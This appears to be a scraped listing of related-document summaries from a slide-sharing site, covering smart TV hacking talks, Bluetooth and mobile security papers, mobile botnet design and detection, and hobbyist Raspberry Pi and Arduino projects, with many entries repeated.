The document discusses security issues with smart TVs. It begins by introducing the authors and their research interests in offensive security and exploiting bugs. It then provides an overview of the talk, which will cover rootkits for smart TVs that can persist even when the TV is powered off, as well as privacy and surveillance capabilities. The document outlines challenges in researching smart TV security due to lack of documentation and notes methods used like reversing binaries and examining UART output. It describes vulnerabilities in smart TV app stores, including bugs that could allow executing arbitrary code or escalating privileges to root.
Developing a Protection Profile for Smart TVSeungjoo Kim
Developing a PP(Protection Profile) for Smart TV @ ICCC 2014 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation (September 9, 2014)
Hacking, Surveilling, and Deceiving Victims on Smart TVSeungjoo Kim
The document discusses hacking and deceiving victims using smart TVs. It begins with background on the authors and their interests in offensive security research. It then covers vulnerabilities in smart TV software and attack surfaces, including discussing how to gain root access by exploiting bugs in smart TV applications or SDKs. The goal is to develop persistent rootkits and surveillance programs on smart TVs without users' knowledge.
This document discusses state-actor surveillance techniques including hardware bugs, software exploits, and compromising cellular and WiFi networks. It describes various surveillance device codenames like "RAGEMASTER" and "HOWLERMONKEY" and explains how hardware can be implanted or firmware hacked to enable persistent surveillance. The document advocates for detection of these devices and urges caution but also skepticism of conspiracy theories without evidence. It provides sources for further reading on technical surveillance techniques.
The document discusses using inexpensive prepaid phones to conduct telephony denial-of-service (TDoS) attacks. It describes how the phones can be modified by unlocking their bootloaders and flashing them with custom firmware, allowing them to make thousands of spoofed calls in order to crash a target organization's phone system. The document shows how a kit with multiple modified phones, solar chargers, and other basic equipment could be used to conduct sustained TDoS attacks for around $21.
IRJET - Dual Verification ATM for Blind PeopleIRJET Journal
This document proposes a dual verification system for ATMs that allows blind people to conduct transactions securely. The system uses both face recognition and speaker identification technologies. It captures a user's face using a Raspberry Pi camera and verifies the user's identity by matching their face to a database. It then prompts the user to speak and matches their voice to the identified face for additional security. If both the face and voice match, the user can conduct transactions by giving voice commands. This dual verification system provides secure access and transactions for visually impaired users of ATMs.
Smart DoorBell - Make your door smart with Raspberry Pi!Mattia Brunetti
This document describes a smart doorbell project created by three students. Their goal was to develop a device that allows remote control of a door using a smartphone. They created a "SmartDoorBell" device connected to the internet and controlled by a Telegram bot. The bot allows taking photos/videos of visitors and unlocking/locking the door. The students tested scenarios for owners, friends, and strangers. They struggled implementing automation for owners using the Telegram API. Their final prototype used a beacon app to automatically unlock the door when the owner's phone was nearby.
Bluetooth is a wireless technology standard that allows for short-range data transmission between devices like computers, mobile phones, and other peripherals. It uses radio waves to replace wired connections like cables. The document discusses Bluetooth's history, specifications including supported data rates and frequency bands, operation principles, security concerns and attacks, and compares it to other wireless technologies like Wi-Fi. It concludes that Bluetooth enables convenient wireless connections between devices for transferring small amounts of data over short distances.
Developing a Protection Profile for Smart TVSeungjoo Kim
Developing a PP(Protection Profile) for Smart TV @ ICCC 2014 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation (September 9, 2014)
Hacking, Surveilling, and Deceiving Victims on Smart TVSeungjoo Kim
The document discusses hacking and deceiving victims using smart TVs. It begins with background on the authors and their interests in offensive security research. It then covers vulnerabilities in smart TV software and attack surfaces, including discussing how to gain root access by exploiting bugs in smart TV applications or SDKs. The goal is to develop persistent rootkits and surveillance programs on smart TVs without users' knowledge.
This document discusses state-actor surveillance techniques including hardware bugs, software exploits, and compromising cellular and WiFi networks. It describes various surveillance device codenames like "RAGEMASTER" and "HOWLERMONKEY" and explains how hardware can be implanted or firmware hacked to enable persistent surveillance. The document advocates for detection of these devices and urges caution but also skepticism of conspiracy theories without evidence. It provides sources for further reading on technical surveillance techniques.
The document discusses using inexpensive prepaid phones to conduct telephony denial-of-service (TDoS) attacks. It describes how the phones can be modified by unlocking their bootloaders and flashing them with custom firmware, allowing them to make thousands of spoofed calls in order to crash a target organization's phone system. The document shows how a kit with multiple modified phones, solar chargers, and other basic equipment could be used to conduct sustained TDoS attacks for around $21.
IRJET - Dual Verification ATM for Blind PeopleIRJET Journal
This document proposes a dual verification system for ATMs that allows blind people to conduct transactions securely. The system uses both face recognition and speaker identification technologies. It captures a user's face using a Raspberry Pi camera and verifies the user's identity by matching their face to a database. It then prompts the user to speak and matches their voice to the identified face for additional security. If both the face and voice match, the user can conduct transactions by giving voice commands. This dual verification system provides secure access and transactions for visually impaired users of ATMs.
Smart DoorBell - Make your door smart with Raspberry Pi!Mattia Brunetti
This document describes a smart doorbell project created by three students. Their goal was to develop a device that allows remote control of a door using a smartphone. They created a "SmartDoorBell" device connected to the internet and controlled by a Telegram bot. The bot allows taking photos/videos of visitors and unlocking/locking the door. The students tested scenarios for owners, friends, and strangers. They struggled implementing automation for owners using the Telegram API. Their final prototype used a beacon app to automatically unlock the door when the owner's phone was nearby.
Bluetooth is a wireless technology standard that allows for short-range data transmission between devices like computers, mobile phones, and other peripherals. It uses radio waves to replace wired connections like cables. The document discusses Bluetooth's history, specifications including supported data rates and frequency bands, operation principles, security concerns and attacks, and compares it to other wireless technologies like Wi-Fi. It concludes that Bluetooth enables convenient wireless connections between devices for transferring small amounts of data over short distances.
This document discusses Bluetooth security risks. It begins with introductions of two security researchers, Matteo Beccaro and Matteo Collura. It then provides an overview of Bluetooth including its history, specifications over different versions, and layer protocol architecture. The document outlines several known Bluetooth attacks from early 2000s like BlueSnarf and BlueBug. It also discusses risks in legacy pairing procedures and describes improvements in secure simple pairing. The document analyzes vulnerabilities in Android's Bluetooth unlock feature prior to version 5.1 and potential exploits. It notes APIs remain at risk even after fixes to the unlock function. Future work areas mentioned include security of IoT devices, smart locks and fitness bands connected via Bluetooth.
Dual Authentication For Bluetooth ConnectionIJERA Editor
Recently, Bluetooth technology is widely used by organizations and individuals to provide wireless personal area network (WPAN). This is because the radio frequency (RF) waves can easily penetrate obstacles and can propagate without direct line-of-sight (LoS). These two characteristics have led to replace wired communication by wireless systems. However, there are serious security challenges associated with wireless communication systems because they are easier to eavesdrop, disrupt and jam than the wired systems. Bluetooth technology started with a form of pairing called legacy pairing prior to any communication. However, due to the serious security issues found in the legacy pairing, a secure and simple pairing called SPP was announced with Bluetooth 2.1 and later since 2007. SPP has solved the main security issue which is the weaknesses of the PIN code in the legacy pairing, however it has been found with some vulnerabilities such as eavesdropping and man-in-the-middle (MITM) attacks. Since the discovery of these vulnerabilities, some enhancements have been proposed to the Bluetooth Specification Interest Group (SIG) which is the regulatory body of Bluetooth technology; nevertheless, some proposed enhancements are ineffective or are not yet implemented by Manufacturers. Therefore, an improvement of the security authentication in Bluetooth connection is highly required to overcome the existing drawbacks. This proposed protocol uses Hash-based Message Authentication Code (HMAC) algorithm with Secure Hash Algorithm (SHA-256). The implementation of this proposal is based on the Arduino Integrated Development Environment (IDE) as software and a Bluetooth (BT) Shield connected to an Arduino Uno R3 boards as hardware. The result was verified on a Graphical User Interface (GUI) built in Microsoft Visual Studio 2010 with C sharp as default environment. It has shown that the proposed scheme works perfectly with the used hardware and software. In addition, the protocol thwarts the passive and active eavesdropping attacks which exist during SSP. These attacks are defeated by avoiding the exchange of passwords and public keys in plain text between the Master and the Slave. Therefore, this protocol is expected to be implemented by the SIG to enhance the security in Bluetooth connection.
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CloudIDSummit
In an ever interconnected and inter-reliant world, the state of security has been a cause for deep pessimism. In the midst of all the gloom, there is good cause for optimism.
With some fits and starts, the building blocks for transforming mobile security are taking shape at every level from the processor, to the chipset to special purpose hardware to operating systems and protocols that address use cases from device integrity to user authentication to payments.
How do we think about security, privacy, identity and authentication in this world? This talk will provide a rapid overview of some selected building blocks and some practical examples that are now deployed at scale to illustrate the coming wave and how you as a practitioner or customer can participate and position yourself for maximum benefit.
IRJET - Mirroring of Source and Sink Devices in Android Screen CastingIRJET Journal
This document presents a system for remotely controlling a PC/laptop using an Android device. The system allows wireless control of keyboard, mouse, media playback, and presentations on the PC/laptop. It consists of an Android application and desktop application connected over WiFi. The Android app captures user input which is sent over sockets to the desktop app, simulating keyboard/mouse events on the PC/laptop in real-time. This allows remote control of the PC/laptop from the Android device. The system was implemented using Java, Android, and networking APIs to transmit data between devices for wireless control.
2009: Voice Security And Privacy (Security Summit - Milan)Fabio Pietrosanti
This document discusses voice security and privacy technologies. It covers the need for lawful and unlawful phone call interception by various entities. It describes common methods used to intercept phone calls both tactically and through telecommunication operators. The risks of widespread eavesdropping to democracy and privacy are discussed. Real world examples of interception scandals are provided. Currently available voice encryption technologies are outlined including those for traditional circuits switched and newer VoIP systems. Upcoming technologies to improve privacy are also mentioned.
This document summarizes the current state of mobile malware, including examples infecting Android and iOS devices. It discusses how malware can steal personal information, messages, and location data. The document also explores the future of mobile malware, such as keylogging apps and malware that records phone calls. It concludes by emphasizing that mobile users should take steps to protect their personal data, such as using security software.
1) VoIP conversations are vulnerable to eavesdropping attacks where an attacker can detect phrases in a conversation without hearing the actual audio. Phrase spotting techniques allow this by analyzing encoded voice data.
2) To defend against eavesdropping, the authors propose padding packets to a fixed length and applying encryption. Low bit rate sections of audio are padded and noise is added before encryption.
3) At the receiver, noise is removed after decryption to reconstruct the original audio. Simulation results show this technique reduces errors compared to no defense. Implementing stronger encryption algorithms could further improve security.
The document discusses a survey of IT security specialists that found 40% believe they could hold their employer's network hostage by withholding encryption keys after leaving the company. A third were confident they could bring a company to a halt with little effort using their knowledge of encryption keys and certificates. The CEO of Venafi, which conducted the survey, said companies must effectively manage encryption keys to avoid breaches.
1) The document describes a voice recognition robot that can be controlled by an Android mobile phone using Bluetooth. The robot has a Bluetooth receiver that receives control commands from the mobile phone app and sends them to a microcontroller to operate motors and control the robot's movement.
2) The goal is to create an inexpensive robot that can be controlled by most users, as Android phones are widely used. The Bluetooth feature on Android phones allows wireless control of the robot over short distances.
3) The robot's hardware includes DC motors connected to a motor driver and microcontroller. The microcontroller is connected to the Bluetooth module. Code is written in Embedded C to make the microcontroller respond to Bluetooth commands and control the motors.
SIP Threat Management device which is released by ALLO.COM is installed in front of any SIP based PBX system or VOIP gateway and offers extra layers of security against numerous types of attacks that are targeted towards IP telephony infrastructure. The features offered by the STM complement those of a traditional firewall or UTM, and it can be installed in conjunction with a UTM.
Instead of losing thousands of dollars due to the victim of VOIP attacks, invest on 300$ worth of ALLO STM, which is plug & play.
Investing in an STM to protect your communications network is a must.
Smart Surveillance Monitoring System using Raspberry pi and pir sensorAM Publications
The security is a scenario in which objects, animals or people are provided with unique identifiers and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction. The webcam has evolved from the convergence of wireless technologies and the Internet. The security system is the communication of anything with any other thing, the communication mainly transferring of useable data, for example, a sensor in a room to monitor and control the temperature. To describe a security alarm system using low processing power chips using Internet of things which helps to monitor and get alarms when motion is detected and sends photos and videos to a cloud server. Moreover, Internet of things based application can be used remotely to view the activity and get notifications when motion is detected. The photos and videos are sent directly to a cloud server when the cloud is not available then the data is stored locally on the Raspberry Pi and sent when the connection resumes. Therefore, advantages like these make this application ideal for monitoring homes in absence.
2FYSH: two-factor authentication you should have for password replacementTELKOMNIKA JOURNAL
Password has been the most used authentication system these days. However, strong passwords are hard to remember and unique to every account. Unfortunately, even with the strongest passwords, password authentication system can still be breached by some kind of attacks. 2FYSH is two tokens-based authentication protocol designed to replace the password authentication entirely. The two tokens are a mobile phone and an NFC card. By utilizing mobile phones as one of the tokens, 2FYSH is offering third layer of security for users that lock their phone with some kind of security. 2FYSH is secure since it uses public and private key along with challenge-response protocol. 2FYSH protects the user from usual password attacks such as man-in-the-middle attack, phishing, eavesdropping, brute forcing, shoulder surfing, key logging, and verifier leaking. The secure design of 2FYSH has made 90% of the usability test participants to prefer 2FYSH for securing their sensitive information. This fact makes 2FYSH best applied to secure sensitive data needs such as bank accounts and corporate secrets.
This document discusses how IoT devices can potentially be weaponized if not properly secured. It provides examples of vulnerabilities found in various IoT devices like kettles, coffee machines, thermostats, and CCTV DVRs that could allow attackers to compromise user accounts, ransom devices, or launch large-scale attacks. The document emphasizes that manufacturers must implement strong security in devices' wireless protocols, firmware, and provisioning processes to prevent attacks.
This document summarizes the design and detection of mobile botnet attacks. It begins by defining a mobile botnet and how they can gain access to mobile devices without anti-malware. It then discusses the history of mobile botnets and some of the challenges in designing effective SMS-based mobile botnets that can evade detection. The document proposes a SMS and WiFi based heterogeneous mobile botnet model using a centralized command and control server. It outlines the methodology for both designing the mobile botnet and detecting whether a smartphone is operating as a bot. Steps for designing and detecting the botnet are provided along with discussing the usefulness and concluding that more work is needed to track down botmasters and develop generalized guidelines.
The document discusses research conducted by Gregg Ganley and Gavin Black at MITRE in FY13-14 on iOS mobile application security. It describes their work on a tool called iMAS (iOS Mobile Application Security) which aims to provide additional security controls and containment for native iOS applications. iMAS addresses vulnerabilities related to runtime access, device access, application access, data at rest, and threats from app stores/malware. It utilizes techniques like encrypted code modules, forced inlining, secure MDM and more to raise security levels above standard iOS but below a fully customized/rooted mobile device environment. The document outlines the motivation, capabilities and future research directions for the iMAS project.
“Design and Detection of Mobile Botnet Attacks”iosrjce
A mobile botnet is a type of bot that runs automatically when installed on a mobile phone, which
does not have any anti-malware. The botnet gains complete access over our mobile device. The common
propagation medium for smartphone based botnet attacks are SMS, Bluetooth and Wi-Fi. In our project, we will
demonstrate a SMS-cum-Wi-Fi based mobile botnet using a centralized C&C server. The botmaster initiates
commands to C&C server and the C&C propagates to infected smartphones i.e. bots. We will try to develop a
network which cannot be detected easily and propagates fast. The target of the propagation will be Android
Operating System. For detection, an application is created to detect whether smartphone is working as bot or
not. In this, we guide user about possible botnet attacks.
This android application decodes any phone number and displays the relevant
details like :
Type: Landline or Mobile
Operator: Name of the operator
Circle Name: Name of the Mobile number's circle or area
Country Name: Name of the Country.
For Landline Numbers if the Country's name is India :
Name: Name of the State
City Name: Name of the City
To close or hide the information bubble (dialog box) anytime during the
incoming call, just press the screen.
Droidcon2013 key2 share_dmitrienko_fraunhoferDroidcon Berlin
The document proposes using smartphones as electronic access keys via NFC, summarizing the Key2Share system which employs cryptography to securely issue and delegate digital keys from a web service to smartphones. It discusses technical approaches to implementing a trusted execution environment (TrEE) on Android to protect keys, either in hardware using secure elements or software using OS-level isolation. Performance tests show authentication takes under half a second. Ongoing work aims to address challenges of backward compatibility and full NFC card emulation support.
Security threats analysis in bluetooth enabled mobile devicesIJNSA Journal
Exponential growth of the volume of Bluetooth-enabled devices indicates that it has become a popular way of wireless interconnections for exchanging information. The main goal of this paper is to analyze the most critical Bluetooth attacks in real scenarios. In order to find out the major vulnerabilities in modern Bluetooth-enabled mobile devices several attacks have performed successfully such as Surveillance, Obfuscation, Sniffing, Unauthorized Direct Data Access (UDDA) and Man-in-the-Middle
Attack (MITM). To perform the testbed, several devices are used such as mobile phones, laptops,
notebooks, wireless headsets, etc. and all the tests are carried out by pen-testing software like hcittml, braudit, spoafiooph, hridump, bluesnarfer, bluebugger and carwhisperer.
How the CC Harmonizes with Secure Software Development LifecycleSeungjoo Kim
How the CC Harmonizes with Secure Software Development Lifecycle @ ICCC 2013 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation
This document discusses Bluetooth security risks. It begins with introductions of two security researchers, Matteo Beccaro and Matteo Collura. It then provides an overview of Bluetooth including its history, specifications over different versions, and layer protocol architecture. The document outlines several known Bluetooth attacks from early 2000s like BlueSnarf and BlueBug. It also discusses risks in legacy pairing procedures and describes improvements in secure simple pairing. The document analyzes vulnerabilities in Android's Bluetooth unlock feature prior to version 5.1 and potential exploits. It notes APIs remain at risk even after fixes to the unlock function. Future work areas mentioned include security of IoT devices, smart locks and fitness bands connected via Bluetooth.
Dual Authentication For Bluetooth ConnectionIJERA Editor
Recently, Bluetooth technology is widely used by organizations and individuals to provide wireless personal area network (WPAN). This is because the radio frequency (RF) waves can easily penetrate obstacles and can propagate without direct line-of-sight (LoS). These two characteristics have led to replace wired communication by wireless systems. However, there are serious security challenges associated with wireless communication systems because they are easier to eavesdrop, disrupt and jam than the wired systems. Bluetooth technology started with a form of pairing called legacy pairing prior to any communication. However, due to the serious security issues found in the legacy pairing, a secure and simple pairing called SPP was announced with Bluetooth 2.1 and later since 2007. SPP has solved the main security issue which is the weaknesses of the PIN code in the legacy pairing, however it has been found with some vulnerabilities such as eavesdropping and man-in-the-middle (MITM) attacks. Since the discovery of these vulnerabilities, some enhancements have been proposed to the Bluetooth Specification Interest Group (SIG) which is the regulatory body of Bluetooth technology; nevertheless, some proposed enhancements are ineffective or are not yet implemented by Manufacturers. Therefore, an improvement of the security authentication in Bluetooth connection is highly required to overcome the existing drawbacks. This proposed protocol uses Hash-based Message Authentication Code (HMAC) algorithm with Secure Hash Algorithm (SHA-256). The implementation of this proposal is based on the Arduino Integrated Development Environment (IDE) as software and a Bluetooth (BT) Shield connected to an Arduino Uno R3 boards as hardware. The result was verified on a Graphical User Interface (GUI) built in Microsoft Visual Studio 2010 with C sharp as default environment. It has shown that the proposed scheme works perfectly with the used hardware and software. In addition, the protocol thwarts the passive and active eavesdropping attacks which exist during SSP. These attacks are defeated by avoiding the exchange of passwords and public keys in plain text between the Master and the Slave. Therefore, this protocol is expected to be implemented by the SIG to enhance the security in Bluetooth connection.
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CloudIDSummit
In an ever interconnected and inter-reliant world, the state of security has been a cause for deep pessimism. In the midst of all the gloom, there is good cause for optimism.
With some fits and starts, the building blocks for transforming mobile security are taking shape at every level from the processor, to the chipset to special purpose hardware to operating systems and protocols that address use cases from device integrity to user authentication to payments.
How do we think about security, privacy, identity and authentication in this world? This talk will provide a rapid overview of some selected building blocks and some practical examples that are now deployed at scale to illustrate the coming wave and how you as a practitioner or customer can participate and position yourself for maximum benefit.
IRJET - Mirroring of Source and Sink Devices in Android Screen CastingIRJET Journal
This document presents a system for remotely controlling a PC/laptop using an Android device. The system allows wireless control of keyboard, mouse, media playback, and presentations on the PC/laptop. It consists of an Android application and desktop application connected over WiFi. The Android app captures user input which is sent over sockets to the desktop app, simulating keyboard/mouse events on the PC/laptop in real-time. This allows remote control of the PC/laptop from the Android device. The system was implemented using Java, Android, and networking APIs to transmit data between devices for wireless control.
2009: Voice Security And Privacy (Security Summit - Milan)Fabio Pietrosanti
This document discusses voice security and privacy technologies. It covers the need for lawful and unlawful phone call interception by various entities. It describes common methods used to intercept phone calls both tactically and through telecommunication operators. The risks of widespread eavesdropping to democracy and privacy are discussed. Real world examples of interception scandals are provided. Currently available voice encryption technologies are outlined including those for traditional circuits switched and newer VoIP systems. Upcoming technologies to improve privacy are also mentioned.
This document summarizes the current state of mobile malware, including examples infecting Android and iOS devices. It discusses how malware can steal personal information, messages, and location data. The document also explores the future of mobile malware, such as keylogging apps and malware that records phone calls. It concludes by emphasizing that mobile users should take steps to protect their personal data, such as using security software.
1) VoIP conversations are vulnerable to eavesdropping attacks where an attacker can detect phrases in a conversation without hearing the actual audio. Phrase spotting techniques allow this by analyzing encoded voice data.
2) To defend against eavesdropping, the authors propose padding packets to a fixed length and applying encryption. Low bit rate sections of audio are padded and noise is added before encryption.
3) At the receiver, noise is removed after decryption to reconstruct the original audio. Simulation results show this technique reduces errors compared to no defense. Implementing stronger encryption algorithms could further improve security.
The document discusses a survey of IT security specialists that found 40% believe they could hold their employer's network hostage by withholding encryption keys after leaving the company. A third were confident they could bring a company to a halt with little effort using their knowledge of encryption keys and certificates. The CEO of Venafi, which conducted the survey, said companies must effectively manage encryption keys to avoid breaches.
1) The document describes a voice recognition robot that can be controlled by an Android mobile phone using Bluetooth. The robot has a Bluetooth receiver that receives control commands from the mobile phone app and sends them to a microcontroller to operate motors and control the robot's movement.
2) The goal is to create an inexpensive robot that can be controlled by most users, as Android phones are widely used. The Bluetooth feature on Android phones allows wireless control of the robot over short distances.
3) The robot's hardware includes DC motors connected to a motor driver and microcontroller. The microcontroller is connected to the Bluetooth module. Code is written in Embedded C to make the microcontroller respond to Bluetooth commands and control the motors.
SIP Threat Management device which is released by ALLO.COM is installed in front of any SIP based PBX system or VOIP gateway and offers extra layers of security against numerous types of attacks that are targeted towards IP telephony infrastructure. The features offered by the STM complement those of a traditional firewall or UTM, and it can be installed in conjunction with a UTM.
Instead of losing thousands of dollars due to the victim of VOIP attacks, invest on 300$ worth of ALLO STM, which is plug & play.
Investing in an STM to protect your communications network is a must.
Smart Surveillance Monitoring System using Raspberry pi and pir sensorAM Publications
The security is a scenario in which objects, animals or people are provided with unique identifiers and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction. The webcam has evolved from the convergence of wireless technologies and the Internet. The security system is the communication of anything with any other thing, the communication mainly transferring of useable data, for example, a sensor in a room to monitor and control the temperature. To describe a security alarm system using low processing power chips using Internet of things which helps to monitor and get alarms when motion is detected and sends photos and videos to a cloud server. Moreover, Internet of things based application can be used remotely to view the activity and get notifications when motion is detected. The photos and videos are sent directly to a cloud server when the cloud is not available then the data is stored locally on the Raspberry Pi and sent when the connection resumes. Therefore, advantages like these make this application ideal for monitoring homes in absence.
2FYSH: two-factor authentication you should have for password replacementTELKOMNIKA JOURNAL
Password has been the most used authentication system these days. However, strong passwords are hard to remember and unique to every account. Unfortunately, even with the strongest passwords, password authentication system can still be breached by some kind of attacks. 2FYSH is two tokens-based authentication protocol designed to replace the password authentication entirely. The two tokens are a mobile phone and an NFC card. By utilizing mobile phones as one of the tokens, 2FYSH is offering third layer of security for users that lock their phone with some kind of security. 2FYSH is secure since it uses public and private key along with challenge-response protocol. 2FYSH protects the user from usual password attacks such as man-in-the-middle attack, phishing, eavesdropping, brute forcing, shoulder surfing, key logging, and verifier leaking. The secure design of 2FYSH has made 90% of the usability test participants to prefer 2FYSH for securing their sensitive information. This fact makes 2FYSH best applied to secure sensitive data needs such as bank accounts and corporate secrets.
This document discusses how IoT devices can potentially be weaponized if not properly secured. It provides examples of vulnerabilities found in various IoT devices like kettles, coffee machines, thermostats, and CCTV DVRs that could allow attackers to compromise user accounts, ransom devices, or launch large-scale attacks. The document emphasizes that manufacturers must implement strong security in devices' wireless protocols, firmware, and provisioning processes to prevent attacks.
This document summarizes the design and detection of mobile botnet attacks. It begins by defining a mobile botnet and how they can gain access to mobile devices without anti-malware. It then discusses the history of mobile botnets and some of the challenges in designing effective SMS-based mobile botnets that can evade detection. The document proposes a SMS and WiFi based heterogeneous mobile botnet model using a centralized command and control server. It outlines the methodology for both designing the mobile botnet and detecting whether a smartphone is operating as a bot. Steps for designing and detecting the botnet are provided along with discussing the usefulness and concluding that more work is needed to track down botmasters and develop generalized guidelines.
The document discusses research conducted by Gregg Ganley and Gavin Black at MITRE in FY13-14 on iOS mobile application security. It describes their work on a tool called iMAS (iOS Mobile Application Security) which aims to provide additional security controls and containment for native iOS applications. iMAS addresses vulnerabilities related to runtime access, device access, application access, data at rest, and threats from app stores/malware. It utilizes techniques like encrypted code modules, forced inlining, secure MDM and more to raise security levels above standard iOS but below a fully customized/rooted mobile device environment. The document outlines the motivation, capabilities and future research directions for the iMAS project.
“Design and Detection of Mobile Botnet Attacks”iosrjce
A mobile botnet is a type of bot that runs automatically when installed on a mobile phone, which
does not have any anti-malware. The botnet gains complete access over our mobile device. The common
propagation medium for smartphone based botnet attacks are SMS, Bluetooth and Wi-Fi. In our project, we will
demonstrate a SMS-cum-Wi-Fi based mobile botnet using a centralized C&C server. The botmaster initiates
commands to C&C server and the C&C propagates to infected smartphones i.e. bots. We will try to develop a
network which cannot be detected easily and propagates fast. The target of the propagation will be Android
Operating System. For detection, an application is created to detect whether smartphone is working as bot or
not. In this, we guide user about possible botnet attacks.
This android application decodes any phone number and displays the relevant
details like :
Type: Landline or Mobile
Operator: Name of the operator
Circle Name: Name of the Mobile number's circle or area
Country Name: Name of the Country.
For Landline Numbers if the Country's name is India :
Name: Name of the State
City Name: Name of the City
To close or hide the information bubble (dialog box) anytime during the
incoming call, just press the screen.
Droidcon2013 key2 share_dmitrienko_fraunhoferDroidcon Berlin
The document proposes using smartphones as electronic access keys via NFC, summarizing the Key2Share system which employs cryptography to securely issue and delegate digital keys from a web service to smartphones. It discusses technical approaches to implementing a trusted execution environment (TrEE) on Android to protect keys, either in hardware using secure elements or software using OS-level isolation. Performance tests show authentication takes under half a second. Ongoing work aims to address challenges of backward compatibility and full NFC card emulation support.
Security threats analysis in bluetooth enabled mobile devicesIJNSA Journal
Exponential growth of the volume of Bluetooth-enabled devices indicates that it has become a popular way of wireless interconnections for exchanging information. The main goal of this paper is to analyze the most critical Bluetooth attacks in real scenarios. In order to find out the major vulnerabilities in modern Bluetooth-enabled mobile devices several attacks have performed successfully such as Surveillance, Obfuscation, Sniffing, Unauthorized Direct Data Access (UDDA) and Man-in-the-Middle
Attack (MITM). To perform the testbed, several devices are used such as mobile phones, laptops,
notebooks, wireless headsets, etc. and all the tests are carried out by pen-testing software like hcittml, braudit, spoafiooph, hridump, bluesnarfer, bluebugger and carwhisperer.
How the CC Harmonizes with Secure Software Development LifecycleSeungjoo Kim
How the CC Harmonizes with Secure Software Development Lifecycle @ ICCC 2013 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation
Using the CGC's Fully Automated Vulnerability Detection Tools in Security Eva...Seungjoo Kim
"Using the CGC's Fully Automated Vulnerability Detection Tools in Security Evaluation and Its Effectiveness - Are Tools Good for Hackers Good for Security Evaluators? -" @ CODE BLUE 2016, Tokyo, Japan (October 20, 2016)
PP(Protection Profile) for E-Certificate Issuance System @ ICCC 2010 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation
Problem and Improvement of the Composition Documents for Smart Card Composed ...Seungjoo Kim
Problem and Improvement of the Composition Documents for Smart Card Composed Product Evaluation @ ICCC 2013 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation
DDoS Attack on DNS using infected IoT DevicesSeungjoo Kim
[Case Study] DDoS Attack on DNS using infected IoT Devices @ ACSAC 2015 (The 31st Annual Computer Security Applications Conference 2015), which is one of the most important cyber security conferences in the world and the oldest information security conference held annually
This document summarizes a lecture on sketching root locus diagrams. It defines poles and zeros as values that make the denominator and numerator of a transfer function equal to zero. It then presents 10 rules for sketching root locus diagrams, such as the lines emanating from the poles and zeros, the paths roots take as a parameter K is varied, and how poles and zeros affect the shape and position of the locus. Examples are provided to demonstrate applying the rules to plot root loci from transfer functions.
The document discusses security issues with smart TVs. It notes that while smart TVs offer convenient features through internet connectivity, they also pose privacy and security risks. The document outlines several problems, including that smart TVs are often insecure due to bad coding practices, rely on security through obscurity, can be vulnerable on the server-side and through installed apps, and may not receive frequent and thorough security updates from vendors. Obtaining access to a smart TV could allow an attacker to spy on homeowners or access company meeting rooms.
DEFCON 23 - Joshua Smith - high def fuzzing - exploitation over HDMI-CECFelipe Prado
The document discusses research into exploiting vulnerabilities over HDMI-CEC. It provides background on HDMI and CEC specifications and implementations. The researcher discovered vulnerabilities in Panasonic and Samsung devices by fuzzing arbitrary CEC messages and monitoring for crashes. Exploitation provided a beachhead for further attacking connected devices. Future work includes exploring more of the HDMI attack surface and additional device types. Mitigations are needed as these attack vectors become more prevalent.
Setting up VoIP management server using a communication framework and let the users from LTE networks to register and make voice calls over IP system as well as video session.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
HITBSecConf 2016-Create Your Own Bad UsbSeunghun han
This document describes IRON-HID, a project for creating custom USB devices that can exploit system vulnerabilities. It discusses using a modified portable charger called PowerShock to test vulnerabilities in smartphones, POS systems, and PCs. The PowerShock uses a Teensy or Arduino board running IRON-HID firmware to emulate a keyboard or mass storage device. It can automatically enter PINs, log keystrokes, capture screenshots, and execute commands on connected devices. Demo attacks show exploiting backup PIN locks on Android phones and grabbing card data from vulnerable POS systems. Additional ideas include modifying USB keyboards and card readers to secretly run the IRON-HID tests on colleague's devices.
NUS-ISS Learning Day 2019-Building IoT solutions with the PiNUS-ISS
This document provides an overview of a hands-on workshop on building IoT solutions with Raspberry Pi. It introduces Raspberry Pi and the GrovePi+ starter kit for connecting sensors. It describes how AWS services like IoT Core and Alexa can be used to build IoT systems. The workshop demonstrates setting up a basic IoT system with Raspberry Pi, testing sensors connected to it, and broadcasting sensor data to the AWS cloud. It aims to help participants understand how to create synergy between sensors, devices, and cloud services to develop health and other applications.
This document provides an overview of Internet of Things (IoT) concepts including what IoT is, sample IoT devices, difference between microcontrollers and microprocessors, popular IoT hardware platforms, categories of IoT, connectivity approaches, protocols, frameworks, tools and cloud platforms. Key topics covered include common IoT devices, how IoT systems connect devices to apps and the cloud, open source frameworks for device integration, and platforms for ingesting and analyzing IoT data.
This document describes the design and implementation of a GSM alarm system. The system uses an Arduino board connected to a GSM shield to detect motion via a PIR sensor and send SMS alerts. It includes a keypad for input, LCD display for status, and buzzer for alarms. Programming was done in C++ using the Arduino IDE. The system aims to provide remote security monitoring via GSM connectivity even when the owner is away. Some challenges included delays receiving hardware and issues with the GSM functionality during testing. Overall the project demonstrated a working GSM alarm prototype.
This document provides instructions for setting up Voicent's Enterprise Edition software to allow for remote access and control of Voicent applications from outside a local network. It discusses installing the server software, accessing the server locally and remotely, and configuring firewall settings to enable remote access via the Internet. The goal is to provide scalable call and text broadcasting solutions that can be controlled from anywhere by sharing systems over the Internet.
IRJEWT-An Intelligent Remote Controlled System for Smart Home AutomationIRJET Journal
1) The document proposes a smart home automation system using a Raspberry Pi that allows users to control and monitor home appliances and security sensors from their smartphones.
2) The system uses a Raspberry Pi connected to sensors and devices like a webcam, door sensors, light switches. The Pi transmits the sensor data and allows control of devices to a user's smartphone over WiFi.
3) The proposed system is intended to provide home security monitoring and control of lights and appliances for users with limited mobility through a simple smartphone interface. It aims to enable users to remotely check security cameras, door sensors, and control lights from their phones.
VoIp Security Services Technical Description Cyber51martinvoelk
